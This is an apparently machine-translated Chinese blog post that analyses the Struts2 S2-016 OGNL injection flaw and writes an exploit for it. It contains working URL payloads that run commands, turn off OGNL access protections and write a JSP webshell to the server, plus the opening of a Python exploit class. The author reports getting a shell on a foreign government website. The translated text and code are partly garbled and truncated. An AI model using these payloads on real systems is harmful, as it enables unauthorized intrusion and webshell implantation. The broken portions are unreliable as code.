1. Overviews2-016 was in July 13, when I was not involved in web security research. This late analysis is also a complement to the past. This vulnerability affects all versions prior to Struts 2.3.15.1. The problem is mainly in the case of Special URL processing, redirect and Redirectaction followed by the OGNL expression will be executed by the server.
2. Vulnerability Analysisanalysis of the open source framework of the vulnerability or from its source, the problem is defaultactiionmapper, this class is mainly used to deal with some flexible URL calls, such as handling the action in the form of dynamic call methods, such as:Http://www.foo.com/bar/hello.action?user!addfoo! Bar This form is a dynamic call to the method in action, where Foo is a Action,bar is the method name, but the premise of the call is to pre-configure in Struts.xml. Of course this is just one, and this class has an important role to deal with redirect, Redirectaction, method, action
method is used to dynamically indicate the methods that are called, such as invoking the Execute method in Hello, you can pass in the URL: Http;//www.foo.com/bar/hello.action?method:execute. The action is used to specify a different action, and with this prefix, the Execute method of the default action in the URL is not executed, but the Execute method in the other action is executed. redirect once written, the Execute method in the default action is not executed, but instead redirects to the other page, which is executed internally through Servletredirectresult. Redirectaction also blocks the default action method, but redirects to the other action, also relying on Servletredirectresult to implement the task. As for why the redirect behind the things will be as OGNL execution? Continue to analyze the source code. pass the following URL to the STRUTS2 framework and set the appropriate breakpoint.
Payload:127.0.0.1:8080/struts_hello/hello?redirect:${%23a%3dnew%20java.lang.processbuilder (new%20java.lang.String[]{% 22netstat%22,%22-an%22}). Start (). getInputStream (),%23b%3dnew%20java.io.inputstreamreader (%23a),%23c%3dnew% 20java.io.bufferedreader (%23b),%23d%3dnew%20char[51020],%23c.read (%23d),%23screen%3d%23context.get (' Com.opensymphony.xwork2.dispatcher.HttpServletResponse '). Getwriter (),%23screen.println (%23d),%23screen.close () }
First of all, the first thing to do in Defaultactionmapper is to extract the name and namespace of the action (namespace), then call two methods, one is Handlespecialparameters, This is mainly a problem with this handlesepcialparameters method. The first step is to extract redirect:${xxxxxx} as key, and then call the Execute method.
follow up and find that one of the constructor methods is called, and this is based on the identified redirect prefix that determines which put method to call. The most compelling is this redirect, this redirect is actually a Servletredirectresult object, the front also said, processing redirect prefix is the class, and here only do one thing, is to specify the direction of redirection, that is, where the logical flow goes. This key.substring (redirect_prefix). Length () is the XXXX content in Redirect:${xxxx}. The above is to do a preprocessing of the URL, and the running environment and objects created, and then the strutsprepareandexecution called the ExecuteAction method: There are children shoes may ask, what is this mapping? In fact, this mapping can be regarded as a parameter table of this request, which stipulates Redierect location, action name, namespace and so on, continue to follow, along the way to the Strutsresultsupport:
This method is to parse the parameters and use them for ognl expressions. The param parameter is a string type, which is actually ${xxx}. Into the translatevariables, this process can clearly see the Struts2 decoration process, and finally came to the Textparseutil class: The parameters are described, the first parameter is a character array, the main provisions of the "redirect:" The symbol that is between the curly braces and the back can be $ or%. Expression is ${xxxx}. The stack is the current value stack. In this method, the contents of the curly braces are first extracted:These just extract the OGNL expression, which is simply a series of string operations, and execution is done through the following statement:var is the extracted OGNL expression, which is the contents of the curly braces. Then executes the Stack.findvalue method, it is this method to execute the OGNL expression, in fact, to the lower level of the ognlutil in the syntax tree analysis and execution, and finally return the results of execution. This execution process is implemented in Ognlvaluestack (for each node in the tree), where the OGNL syntax tree algorithm is involved and is not described here. Analysis here, I believe a lot of people will understand how this OGNL is executed, this is the most fundamental place of Struts2 loophole, each Struts2 loophole is around the OGNL expression mechanism. The detection and analysis of different methods (strange representations of various payload) is done to eventually let the server execute our OGNL expression code.
3. SummaryThe root cause of s2-016 is that there is no strict filtering on the back of several prefixes, resulting in a hacker passing in a string that conforms to the OGNL expression syntax rules, allowing STRUTS2 to execute it as a OGNL expression in valuestack, resulting in arbitrary command execution. Getshell, column catalogs, Echo uploads are essentially Java code execution.
4, S2-016 's exp writingAnalysis of the loopholes in the principle, in fact, write a exp is not too difficult. But here's a big hole, that's when I was debugging exp, I found this vulnerability to be different from the previous S2 vulnerability. For some special characters in the URL, such as equal number, space, bracket, double quotation mark, #符号等, must be strictly urlencode, otherwise exp will fail, do not know how to work behind, interested children shoes can try to explore. In the end, give me the vulnerability monitoring +getshell script, the code is as follows:
POC:%23p%3d%23context.get (' Com.opensymphony.xwork2.dispatcher.HttpServletResponse '). Getwriter (),%23p.println (% 22HACKER%22),%23p.close ()
Getshell:%23context[%22xwork. methodaccessor.denymethodexecution%22]%3dfalse%2c%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c %23a%3d%23context%5b%22com.opensymphony.xwork2.dispatcher.httpservletrequest%22%5d%2c%23b%3dnew+ Java.io.FileOutputStream (New+java.lang.stringbuilder (%23a.getrealpath (%22/%22)). Append (@[email protected]). Append (%22system.jsp%22))%2c%23b.write (%23a.getparameter ("T"). GetBytes ())%2c%23b.close%28%29%2c%23p%3d% 23context%5b%22com.opensymphony.xwork2.dispatcher.httpservletresponse%22%5d.getwriter%28%29%2c%23p.println%28% 22done%22%29%2c%23p.flush%28%29%2c%23p.close%28%29
#coding =utf-8import sysimport requestsclass strutsexploit ():d ef __init__ (self): Self.webshell = ' <%@ page language = "java" pageencoding= "GBK"%><jsp:directive.page import= "Java.io.File"/><jsp:directive.page import= " Java.io.OutputStream "/><jsp:directive.page import=" Java.io.FileOutputStream "/>
Test Run Results:
Shell results (foreign ZF website):
Analysis of s2-016 vulnerability of STRUTS2 and exp writing
